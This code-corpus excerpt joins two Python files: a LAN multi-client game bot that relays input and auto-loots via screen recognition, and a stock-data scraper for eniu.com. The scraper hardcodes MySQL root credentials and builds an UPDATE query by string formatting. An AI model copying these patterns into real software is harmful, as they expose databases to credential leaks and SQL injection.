message = self.fern.encrypt(message)
message_header = f"{len(message):<{self.HEADER_LENGTH}}".encode(
'utf-8')
time.sleep(delay - (time.time()-start_time))
self.client_socket.send(message_header + message)
def main_loop(self):
while True:
time.sleep(0.5)
class ClientKeypressListener():
def __init__(self, list_servers, test=False, delay_spacing=12) -> None:
self.test = test
self.list_servers = list_servers
self.listener = None
self.unreleased_keys = []
# Hotkey handling
self.transmitting = True
self.single_server = None
self.delay_spacing = delay_spacing
self.x_loot_only = True
self.autoloot_enabled = False
self.quest_handle = QuestHandle()
self.quest_handle_clicks = 0
self.scaling = ClientUtils.get_monitor_scaling()
# print("Scaling={}".format(self.scaling))
with open("gamename.txt") as f:
self.gamename = f.readline()
if not self.test:
self.game_wincap = WindowCapture(self.gamename)
# These are for batch recording and sending
self.batch_recording_ongoing = False
self.batch_start_time = 0
self.batch = ""
self.delay_spread = []
self.create_random_delays()
# These are for the sell and repair logic
self.sell_repair = SellRepair(last_row_protect=True)
self.selling_ongoing = 0
# These are for allowing x in all cases
self.xallow = False
# These are for the v2 regroup command
self.map_rect = None
self.level_name = None
self.speed = 20
self.rects = {}
self.speeds = {}
self.num_names = []
self.load_level_rects()
self.player_pos = None
# Input mode, true = pag, false = custom
self.inputmode = False
# Autoloot support client-side
self.xprompt_filter, xprompt_custom_rect = grab_object_preset(
object_name="prompt_press_x_pickup")
self.xprompt_wincap = WindowCapture(
self.gamename, xprompt_custom_rect)
self.xprompt_vision = Vision("xprompt67filtv2.jpg")
def try_toggle_map(self):
# print("Toggling map")
# time.sleep(0.1)
# pydirectinput.keyDown("m")
# time.sleep(0.18)
# pydirectinput.keyUp("m")
# time.sleep(0.08)
pydirectinput.click(
int(self.scaling*1262+self.game_wincap.window_rect[0]), int(self.scaling*64+self.game_wincap.window_rect[1]))
# print("Finished toggling map")
def close_map(self):
pydirectinput.click(
int(self.scaling*859+self.game_wincap.window_rect[0]), int(self.scaling*260+self.game_wincap.window_rect[1]))
def string_to_rect(self, string: str):
return [int(i) for i in string.split(',')]
def load_level_rects(self):
# Load the translation from name to num
with open("lvl_name_num.txt") as f:
self.num_names = f.readlines()
for i, entry in enumerate(self.num_names):
self.num_names[i] = entry.split("-")
# Load the num to rect catalogue
with open("catalogue.txt") as f:
nums_rects = f.readlines()
for i, entry in enumerate(nums_rects):
nums_rects[i] = entry.split("-")
# Finally load the level speeds
with open("lvl_speed.txt") as f:
num_speeds = f.readlines()
for i, entry in enumerate(num_speeds):
num_speeds[i] = entry.split("|")
# Then add each rect to the rects dict against name
# Also add each speed to the speed dict against name
for number, name in self.num_names:
for num, area, rect in nums_rects:
if area == "FM" and num == number:
self.rects[name.rstrip().replace(" ", "")] = rect.rstrip()
if "1" in name:
self.rects[name.rstrip().replace(
" ", "").replace("1", "L")] = rect.rstrip()
if "ri" in name:
self.rects[name.rstrip().replace(
" ", "").replace("ri", "n").replace("1", "L")] = rect.rstrip()
break
for num, speed in num_speeds:
if num == number:
self.speeds[name.rstrip().replace(
" ", "")] = float(speed.rstrip())
if "1" in name:
self.speeds[name.rstrip().replace(
" ", "").replace("1", "L")] = float(speed.rstrip())
if "ri" in name:
self.speeds[name.rstrip().replace(
" ", "").replace("ri", "n").replace("1", "L")] = float(speed.rstrip())
break
def detect_name(self):
plyrname_rect = [165, 45, 320, 65]
plyrname_wincap = WindowCapture(self.gamename, plyrname_rect)
plyrname_filt = HsvFilter(0, 0, 103, 89, 104, 255, 0, 0, 0, 0)
plyrmname_vision = Vision('xprompt67filtv2.jpg')
# get an updated image of the game
image = plyrname_wincap.get_screenshot()
# pre-process the image
image = plyrmname_vision.apply_hsv_filter(
image, plyrname_filt)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
biggest = 0
for entry in results["text"]:
if len(entry) > biggest:
name = entry
biggest = len(entry)
return name
def start_mouse_listener(self):
if not self.test:
self.mouse_listener = mouse.Listener(
on_click=self.on_click)
else:
self.mouse_listener = mouse.Listener(
on_click=self.on_click_test)
self.mouse_listener.start()
def on_click(self, x, y, button, pressed):
if self.selling_ongoing != 0:
if self.selling_ongoing < time.time() - 4:
self.selling_ongoing = 0
elif self.quest_handle_clicks > 0:
self.quest_handle_clicks -= 1
# First off need to check if transmitting is enabled
elif self.transmitting:
# Need to then check if the click was in the right window
# Do this by checking if window focused
if GetWindowText(GetForegroundWindow()) == self.gamename:
# when pressed is False, that means it's a release event.
# let's listen only to mouse click releases
if not pressed:
# Need to get the ratio compared to window top left
# This will allow common usage on other size monitors
# print("x={}, y={}".format(x, y))
xratio, yratio = self.convert_click_to_ratio(x, y)
# print("xrat={}, yrat={}".format(xratio, yratio))
if self.batch_recording_ongoing:
self.batch += str(button) + "|click|" + \
"{:.3f}".format((time.time() - self.batch_start_time)) + \
"|"+"{:.5f},{:.5f}\n".format(xratio, yratio)
else:
for server in self.list_servers:
server.send_message(
str(button) + ","+str(xratio)+"|"+str(yratio))
def start_keypress_listener(self):
if self.listener == None:
if not self.test:
self.listener = Listener(on_press=self.on_press,
on_release=self.on_release)
else:
self.listener = Listener(on_press=self.on_press_test,
on_release=self.on_release_test)
self.listener.start()
def on_press(self, key):
if self.selling_ongoing != 0:
if self.selling_ongoing < time.time() - 4:
self.selling_ongoing = 0
elif key == KeyCode(char='0'):
print("Exiting bot")
for server in self.list_servers:
server.delay = 0
server.send_message("quit,1")
os._exit(1)
elif self.transmitting:
if key == KeyCode(char='1'):
self.transmitting = False
print("TRANSMIT OFF")
elif key == KeyCode(char='2'):
self.batch_recording_ongoing = not self.batch_recording_ongoing
if self.batch_recording_ongoing:
print("Starting batch record")
self.batch_start_time = time.time()
else:
# todo - create threads to send the batches
for i, server in enumerate(self.list_servers):
t = threading.Thread(
target=self.send_batch, args=(server, self.batch, i))
t.start()
print("Ending batch record")
self.batch = ""
elif key == KeyCode(char='3'):
for server in self.list_servers:
server.send_message("revive,1")
print("Reviving...")
elif key == KeyCode(char='4'):
self.inputmode = not self.inputmode
for server in self.list_servers:
if self.inputmode:
server.send_message("inputmode,1")
else:
server.send_message("inputmode,0")
if self.inputmode:
print("Swapping to PAG")
else:
print("Swapping to Custom")
elif key == KeyCode(char='5'):
try:
x, y = self.find_player()
for server in self.list_servers:
server.send_message("regroup,{}|{}".format(x, y))
print("Regrouping...")
time.sleep(0.01)
self.close_map()
except:
print("Unable to find player right now")
elif key == KeyCode(char='6'):
self.autoloot_enabled = not self.autoloot_enabled
if self.autoloot_enabled:
for server in self.list_servers:
server.send_message("autoloot,on")
print("AUTOLOOT ON")
else:
for server in self.list_servers:
server.send_message("autoloot,off")
print("AUTOLOOT OFF")
elif key == KeyCode(char='7'):
self.selling_ongoing = time.time()
for server in self.list_servers:
server.send_message("sellrepair,1")
print("Selling and repairing...")
os.popen('python sell_repair.py')
# self.sell_repair.ident_sell_repair()
elif key == KeyCode(char='8'):
self.quest_handle_clicks += 1
if not self.batch_recording_ongoing:
for server in self.list_servers:
server.send_message("questhandle,1")
else:
self.batch += str(key) + "|questhandle|" + \
"{:.3f}".format(
(time.time() - self.batch_start_time)) + "|0,0\n"
self.quest_handle.start_quest_handle()
elif key == KeyCode(char='9'):
self.xallow = not self.xallow
if self.xallow:
for server in self.list_servers:
server.send_message("xallow,1")
print("XALLOW ON")
else:
for server in self.list_servers:
server.send_message("xallow,0")
print("XALLOW OFF")
elif key == KeyCode(char='-'):
for server in self.list_servers:
server.send_message("clearall,1")
print("Clearing All...")
elif self.autoloot_enabled and key == KeyCode(char='x'):
pass
elif GetWindowText(GetForegroundWindow()) == self.gamename:
if str(key) not in self.unreleased_keys:
if not self.batch_recording_ongoing:
for server in self.list_servers:
server.send_message(str(key)+",down")
self.unreleased_keys.append(str(key))
else:
self.batch += str(key) + "|keyDown|" + \
"{:.3f}".format(
(time.time() - self.batch_start_time)) + "|0,0\n"
self.unreleased_keys.append(str(key))
elif key == KeyCode(char='1'):
self.transmitting = True
if self.batch_recording_ongoing:
for i, server in enumerate(self.list_servers):
t = threading.Thread(
target=self.send_batch, args=(server, self.batch, i))
t.start()
self.batch_recording_ongoing = False
print("TRANSMIT ON")
def auto_loot(self):
consec_xpress = 0
while self.autoloot_enabled:
if self.loot_if_available():
consec_xpress += 1
if not consec_xpress > 6:
time.sleep(0.01)
pydirectinput.keyUp("x")
# self.release_key(self.key_map["x"])
time.sleep(0.15)
else:
time.sleep(0.4)
else:
time.sleep(0.1)
consec_xpress = 0
def autoloot_thread_start(self):
t = threading.Thread(target=self.auto_loot, daemon=True)
self.autoloot_enabled = True
t.start()
def loot_if_available(self):
# get an updated image of the game at specified area
xprompt_screenshot = self.xprompt_wincap.get_screenshot()
# pre-process the image to help with detection
xprompt_output_image = self.xprompt_vision.apply_hsv_filter(
xprompt_screenshot, self.xprompt_filter)
# do object detection, this time grab rectangles
xprompt_rectangles = self.xprompt_vision.find(
xprompt_output_image, threshold=0.61, epsilon=0.5)
# then return answer to whether currently in dungeon
if len(xprompt_rectangles) == 1:
# self.press_key(self.key_map["x"])
pydirectinput.keyDown("x")
# keyup performed in main loop
# return True for autoloot
return True
def find_player(self):
self.level_name = self.detect_level_name()
# Then grab the right rect for the level
try:
self.map_rect = self.string_to_rect(self.rects[self.level_name])
self.speed = self.speeds[self.level_name]
except:
try:
best_match = process.extractOne(
self.level_name, self.rects, score_cutoff=0.8)
self.map_rect = self.string_to_rect(
self.rects[best_match])
self.speed = self.speeds[best_match]
except:
self.map_rect = [362, 243, 1105, 748]
self.speed = 30
# Then open the map
if not self.detect_bigmap_open():
self.try_toggle_map()
return self.grab_player_pos()
def grab_player_pos(self):
if not self.map_rect:
wincap = WindowCapture(self.gamename)
else:
wincap = WindowCapture(self.gamename, self.map_rect)
filter = HsvFilter(34, 160, 122, 50, 255, 255, 0, 0, 0, 0)
image = wincap.get_screenshot()
save_image = self.filter_blackwhite_invert(filter, image)
# cv2.imwrite("testy3.jpg", save_image)
vision_limestone = Vision('plyr.jpg')
rectangles = vision_limestone.find(
save_image, threshold=0.31, epsilon=0.5)
points = vision_limestone.get_click_points(rectangles)
try:
x, y = points[0]
if not self.map_rect:
return x, y
else:
x += self.map_rect[0]
y += self.map_rect[1]
return x, y
except:
return False
def on_release(self, key):
if key == KeyCode(char='1'):
pass
elif key == KeyCode(char='2'):
pass
elif key == KeyCode(char='3'):
pass
elif key == KeyCode(char='4'):
pass
elif key == KeyCode(char='5'):
pass
elif key == KeyCode(char='6'):
pass
elif key == KeyCode(char='7'):
pass
elif key == KeyCode(char='8'):
pass
elif key == KeyCode(char='9'):
pass
elif self.autoloot_enabled and key == KeyCode(char='x'):
pass
elif self.transmitting:
if GetWindowText(GetForegroundWindow()) == self.gamename:
if not self.batch_recording_ongoing:
for server in self.list_servers:
server.send_message(str(key)+",up")
else:
self.batch += str(key) + "|keyUp|" + \
"{:.3f}".format(
(time.time() - self.batch_start_time)) + "|0,0\n"
try:
self.unreleased_keys.remove(str(key))
except:
pass
if len(self.batch) > 2500:
# need to first check if there are still keys pressed down
if len(self.unreleased_keys) == 0:
print("Sending batch now due to size")
self.batch_start_time = time.time()
# print(self.batch)
self.batch = ""
def filter_blackwhite_invert(self, filter, existing_image):
hsv = cv2.cvtColor(existing_image, cv2.COLOR_BGR2HSV)
hsv_filter = filter
# add/subtract saturation and value
h, s, v = cv2.split(hsv)
s = self.shift_channel(s, hsv_filter.sAdd)
s = self.shift_channel(s, -hsv_filter.sSub)
v = self.shift_channel(v, hsv_filter.vAdd)
v = self.shift_channel(v, -hsv_filter.vSub)
hsv = cv2.merge([h, s, v])
# Set minimum and maximum HSV values to display
lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
# Apply the thresholds
mask = cv2.inRange(hsv, lower, upper)
result = cv2.bitwise_and(hsv, hsv, mask=mask)
# convert back to BGR
img = cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
# now change it to greyscale
grayImage = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# now change it to black and white
(thresh, blackAndWhiteImage) = cv2.threshold(
grayImage, 67, 255, cv2.THRESH_BINARY)
# now invert it
inverted = (255-blackAndWhiteImage)
inverted = cv2.cvtColor(inverted, cv2.COLOR_GRAY2BGR)
return inverted
def shift_channel(self, c, amount):
if amount > 0:
lim = 255 - amount
c[c >= lim] = 255
c[c < lim] += amount
elif amount < 0:
amount = -amount
lim = amount
c[c <= lim] = 0
c[c > lim] -= amount
return c
def detect_level_name(self):
wincap = WindowCapture(self.gamename, [1121, 31, 1248, 44])
existing_image = wincap.get_screenshot()
filter = HsvFilter(0, 0, 0, 169, 34, 255, 0, 0, 0, 0)
vision_limestone = Vision('plyr.jpg')
# cv2.imwrite("testy2.jpg", existing_image)
save_image = vision_limestone.apply_hsv_filter(existing_image, filter)
# cv2.imwrite("testy3.jpg", save_image)
gray_image = cv2.cvtColor(save_image, cv2.COLOR_BGR2GRAY)
(thresh, blackAndWhiteImage) = cv2.threshold(
gray_image, 129, 255, cv2.THRESH_BINARY)
# now invert it
inverted = (255-blackAndWhiteImage)
save_image = cv2.cvtColor(inverted, cv2.COLOR_GRAY2BGR)
rgb = cv2.cvtColor(save_image, cv2.COLOR_BGR2RGB)
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
return result
def detect_bigmap_open(self):
wincap = WindowCapture(self.gamename, custom_rect=[819, 263, 855, 264])
image = wincap.get_screenshot()
cv2.imwrite("testy.jpg", image)
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-2]]
if a+b+c < 30:
if d+e+f > 700:
# print("Working")
return True
return False
def create_random_delays(self):
for index, _ in enumerate(self.list_servers):
self.delay_spread.append(
self.delay_spacing + (index * self.delay_spacing * uniform(0.8, 1.2)))
def send_batch(self, server, batch, index):
delay = self.delay_spread[index]
time.sleep(delay)
if len(batch) > 1:
server.send_message("batch,1\n"+batch)
def convert_click_to_ratio(self, truex, truey):
# This will grab the current rectangle coords of game window
# and then turn the click values into a ratio of positions
# versus the game window
self.game_wincap.update_window_position(border=False)
# Turn the screen pos into window pos
relx = (truex - self.game_wincap.window_rect[0]) * self.scaling
rely = (truey - self.game_wincap.window_rect[1]) * self.scaling
# print("relx={}, rely={}".format(relx, rely))
# print("winx={}, winy={}".format(
# self.game_wincap.window_rect[0], self.game_wincap.window_rect[1]))
# print("winwidth={}".format(self.game_wincap.w))
# Then convert to a ratio
ratx = relx/(self.game_wincap.w*self.scaling)
raty = rely/(self.game_wincap.h*self.scaling)
# Test convert back to a click
# convx, convy = self.convert_ratio_to_click(ratx, raty)
# print("convx={}, convy={}".format(convx, convy))
return ratx, raty
def on_click_test(self, x, y, button, pressed):
# when pressed is False, that means it's a release event.
# let's listen only to mouse click releases
if self.transmitting:
if not pressed:
# Need to get the ratio compared to window top left
# This will allow common usage on other size monitors
# xratio, yratio = self.convert_click_to_ratio(x, y)
for server in self.list_servers:
server.send_message("click,"+str(x)+"|"+str(y))
def on_press_test(self, key):
if key == keyboard.Key.f4:
print("Exiting bot")
for server in self.list_servers:
server.delay = 0
server.send_message("quit,1")
os._exit(1)
if self.transmitting:
if str(key) not in self.unreleased_keys:
for server in self.list_servers:
server.send_message(str(key)+",down")
self.unreleased_keys.append(str(key))
def on_release_test(self, key):
if self.transmitting:
for server in self.list_servers:
server.send_message(str(key)+",up")
self.unreleased_keys.remove(str(key))
class ClientUtils():
def grab_online_servers():
output = subprocess.run("arp -a", capture_output=True).stdout.decode()
list_ips = []
with open("servers.txt", "r") as f:
lines = f.readlines()
for ip in lines:
if ip.strip() in output:
list_ips.append(ip.strip())
return list_ips
def start_server_threads(list_servers):
for server in list_servers:
t = threading.Thread(target=server.main_loop)
t.start()
def get_monitor_scaling():
user32 = ctypes.windll.user32
w_orig = GetSystemMetrics(0)
user32.SetProcessDPIAware()
[w, h] = [user32.GetSystemMetrics(0), user32.GetSystemMetrics(1)]
return float(("{:.2f}".format(w/w_orig)))
class RHBotClient():
def start(delay_spacing=12, test=False):
list_ips = ClientUtils.grab_online_servers()
list_servers = []
for ip in list_ips:
list_servers.append(RHBotClientConnection(ip))
ckl = ClientKeypressListener(
list_servers, test, delay_spacing)
ckl.start_mouse_listener()
ckl.start_keypress_listener()
with open("mainplayer.txt") as f:
mainplayer = f.readline()
# try:
# mainplayer = ckl.detect_name()
# except:
# pass
# for server in list_servers:
ClientUtils.start_server_threads(list_servers)
time.sleep(0.25)
for server in list_servers:
server.send_message("mainplayer,"+mainplayer)
while True:
time.sleep(0.25)
if ckl.batch_recording_ongoing:
if time.time() > ckl.batch_start_time + 10:
if len(ckl.unreleased_keys) == 0:
ckl.batch_start_time = time.time()
for i, server in enumerate(list_servers):
t = threading.Thread(
target=ckl.send_batch, args=(server, ckl.batch, i))
t.start()
ckl.batch = ""
if __name__ == "__main__":
RHBotClient.start(test=False)
| 2.09375 | 2 |
dataList_fast.py | 181654686/stoke_spider | 2 | 12772919 | import requests #导入requests包
import json
import records
import configparser
import time
from lxml import etree
import xml.sax
import time
# sz000001
db = records.Database("mysql://root:123456@localhost:3306/gupiao?charset=utf8")
# data = [
# {'name': 'Jiji', 'age': 23},
# {'name': 'Mini', 'age': 22}
# ]
# db.bulk_query("insert names(name, age) values(:name, :age)", data)
class myXmlHandler(xml.sax.ContentHandler):
def __init__(self):
self.CurrentName = ""
self.CurrentData = ""
# 元素开始调用
def startElement(self, tag, attributes):
self.CurrentName = tag
# 元素结束调用
def endElement(self, tag):
pass
# 读取字符时调用
def characters(self, content):
self.CurrentData = content
class stork():
def __init__(self,storkid):
self.storkid = storkid
self.dayData = {}
self.yearData = {}
self._dataList = {}
self._dataList["价格"] = "//*[@id='changyong']/p[1]/a"
self._dataList["市盈率"] = "//*[@id='changyong']/p[2]/a"
self._dataList["市净率"]= "//*[@id='changyong']/p[3]/a"
self._dataList["股息率"]= "//*[@id='changyong']/p[4]/a"
self._dataList["市值"]= "//*[@id='changyong']/p[5]/a"
self._dataList["roe"] ="//*[@id='changyong']/p[6]/a"
self._dataList["净利润"] ="//*[@id='caiwu']/p[2]/a"
self._dataList["营收"] ="//*[@id='caiwu']/p[3]/a"
self._dataList["利润扣非"] ="//*[@id='caiwu']/p[4]/a"
self._dataList["负债率"] ="//*[@id='caiwu']/p[5]/a"
self._dataList["现金流"] ="//*[@id='caiwu']/p[6]/a"
self._dataList["毛利率"] ="//*[@id='caiwu']/p[7]/a"
self._dataList["每股收益"] ="//*[@id='caiwu']/p[8]/a"
def getData(self):
url = 'https://eniu.com/gu/'+self.storkid
strhtml = requests.get(url) #Get方式获取网页数据
html = etree.HTML(strhtml.text)
for key,value in self._dataList.items():
html_data = html.xpath(value)
print(key+":"+html_data[0].text)
pass
def getPriceData(self):
"https://eniu.com/chart/pricea/sz000001/t/all"
url = "https://eniu.com/chart/pricea/{}/t/all".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'price'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['price'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'price':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getPEAData(self):
"https://eniu.com/chart/pea/sz000001/t/all"
url = "https://eniu.com/chart/pea/{}/t/all".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'pe_ttm'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['pea'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'pea':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getPbData(self):
"https://eniu.com/chart/pba/sz000001/t/all"
url = "https://eniu.com/chart/pba/{}/t/all".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'pb'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['pb'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'pb':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getguxiData(self):
"https://eniu.com/chart/dva/sz000001/t/all"
url = "https://eniu.com/chart/dva/{}/t/all".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'dv'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['guxi'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'guxi':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getvalueData(self):
"https://eniu.com/chart/marketvaluea/sz000001"
url = "https://eniu.com/chart/marketvaluea/{}".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'market_value'
if str(params_json['date'][d]) in self.dayData:
self.dayData[str(params_json['date'][d])]['value'] = str(params_json[price_in][d])
else:
self.dayData[str(params_json['date'][d])] = {'value':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getRoeaData(self):
"https://eniu.com/chart/roea/sz000001/q/4"
url = "https://eniu.com/chart/roea/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'roe'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['roe'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'roe':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
price_in = 'roa'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['roa'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'roa':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getProfitData(self):
"https://eniu.com/chart/profita/sz000001/q/4"
url = "https://eniu.com/chart/profita/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'profit'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['profit'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'profit':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getIncomeData(self):
"https://eniu.com/chart/incomea/sz000001/q/4"
url = "https://eniu.com/chart/incomea/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'income'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['income'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'income':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getprofitkfData(self):
"https://eniu.com/chart/profitkfa/sz000001/q/4"
url = "https://eniu.com/chart/profitkfa/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'profit_kf'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['profit_kf'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'profit_kf':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getdebtratioData(self):
"https://eniu.com/chart/debtratioa/sz000001/q/4"
url = "https://eniu.com/chart/debtratioa/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'asset'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['debtratio'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'debtratio':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getcashflowData(self):
"https://eniu.com/chart/cashflowa/sz000001/q/4"
url = "https://eniu.com/chart/cashflowa/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'cash_flow'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['cashflow'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'cashflow':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getgrossprofitData(self):
"https://eniu.com/chart/grossprofitmargina/sz000001/q/4"
url = "https://eniu.com/chart/grossprofitmargina/{}/q/4".format(self.storkid)
strhtml = requests.get(url) #Get方式获取网页数据
try:
params_json = json.loads(strhtml.text)
except:
return
if len(params_json) == 0:
return
for d in range(0, len(params_json['date'])):
price_in = 'net_profit_margin'
if str(params_json['date'][d]) in self.yearData:
self.yearData[str(params_json['date'][d])]['grossprofit'] = str(params_json[price_in][d])
else:
self.yearData[str(params_json['date'][d])] = {'grossprofit':str(params_json[price_in][d]),'stock_id':str(self.storkid)}
def getCawuData(self):
"https://eniu.com/table/cwzba/sz000001/q/4"
url = 'https://eniu.com/table/cwzba/'+self.storkid+"/q/4"
strhtml = requests.get(url) #Get方式获取网页数据
# html = etree.HTML(strhtml.text)
try:
params_json = json.loads(strhtml.text)
except:
return
# with open("{}财务.txt".format(self.storkid),'w') as f:
# json.dump(strhtml.text,f)
if len(params_json) == 0:
return
data = []
for p in params_json:
if p['keyName'].find('<')!=-1:
continue
for k,v in p.items():
if k == 'keyName':
continue
v_temp = v
if type(v) == type("str") and v.find('<')!=-1:
saxParse = xml.sax.make_parser()
saxParse.setFeature(xml.sax.handler.feature_namespaces, 0) # 关闭命名解析
Handler = myXmlHandler()
xml.sax.parseString(v,Handler)
v_temp = Handler.CurrentData
data.append({'id':0 , 'date':str(k),
'value':str(v_temp),
'stokeid':str(self.storkid),
'caiwutype':str(p['keyName'])})
if len(data)>0:
db.bulk_query("insert stoke_caiwu_history(id,date, value,stokeid,caiwutype) \
values(:id, :date, :value,:stokeid,:caiwutype)", data)
# CREATE TABLE `gupiao`.`stoke_day_history` (
# `id` INT NOT NULL AUTO_INCREMENT,
# `day` VARCHAR(45) NULL,
# `guxi` VARCHAR(45) NULL,
# `pea` VARCHAR(45) NULL,
# `price` VARCHAR(45) NULL,
# `value` VARCHAR(45) NULL,
# `pb` VARCHAR(45) NULL,
# PRIMARY KEY (`id`));
def insertDayData(self):
data = []
for k,v in self.dayData.items():
guxi=''
pea=''
price=''
value=''
pb=''
if 'guxi' in v:
guxi = v['guxi']
if 'pea'in v:
pea = v['pea']
if 'price' in v:
price = v['price']
if 'value' in v:
value = v['value']
if 'pb' in v:
pb = v['pb']
data.append({'id':0,'day':k, 'guxi':guxi,'pea':pea,
'price':price,'value':value,'pb':pb,'stoke_id':self.storkid})
if len(data)>0:
db.bulk_query("insert stoke_day_history(id,day, guxi,pea,price,value,pb,stoke_id) \
values(:id, :day, :guxi,:pea,:price,:value,:pb,:stoke_id)", data)
pass
# CREATE TABLE `gupiao`.`stoke_year_history` (
# `id` INT NOT NULL AUTO_INCREMENT,
# `years` VARCHAR(45) NULL,
# `cashflow` VARCHAR(45) NULL,
# `debtratio` VARCHAR(45) NULL,
# `grossprofit` VARCHAR(45) NULL,
# `income` VARCHAR(45) NULL,
# `profit` VARCHAR(45) NULL,
# `profit_kf` VARCHAR(45) NULL,
# `roa` VARCHAR(45) NULL,
# `roe` VARCHAR(45) NULL,
# PRIMARY KEY (`id`));
def insertYearData(self):
data = []
for k,v in self.yearData.items():
cashflow=''
debtratio=''
grossprofit=''
income=''
profit=''
profit_kf =''
roa=''
roe = ''
if 'cashflow' in v:
cashflow = v['cashflow']
if 'debtratio' in v:
debtratio = v['debtratio']
if 'grossprofit' in v:
grossprofit = v['grossprofit']
if 'income' in v:
income = v['income']
if 'profit' in v:
profit = v['profit']
if 'profit_kf' in v:
profit_kf = v['profit_kf']
if 'roa' in v:
roa = v['roa']
if 'roe' in v:
roe = v['roe']
data.append({'id':0,'years':k, 'cashflow':cashflow,'debtratio':debtratio,
'grossprofit':grossprofit,'income':income,'profit':profit,
'profit_kf':profit_kf,'roa':roa,'roe':roe,'stoke_id':self.storkid})
if len(data)>0:
db.bulk_query("insert stoke_year_history(id,years, cashflow,debtratio,grossprofit,income,profit,profit_kf,roa,roe,stoke_id) \
values(:id,:years,:cashflow,:debtratio,:grossprofit,:income,:profit,:profit_kf,:roa,:roe,:stoke_id)", data)
def done(self):
insertSql = "UPDATE main_list set done = 'ok' where stock_id='{}'"\
.format(str(self.storkid))
try:
db.query(insertSql)
except Exception as e:
print(e)
pass
def getAlldata(stoke_id):
s = stork(stoke_id)
print('stoke_id:'+ stoke_id)
# s.getData()
# print('getPriceData:'+ time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) )
s.getPriceData()
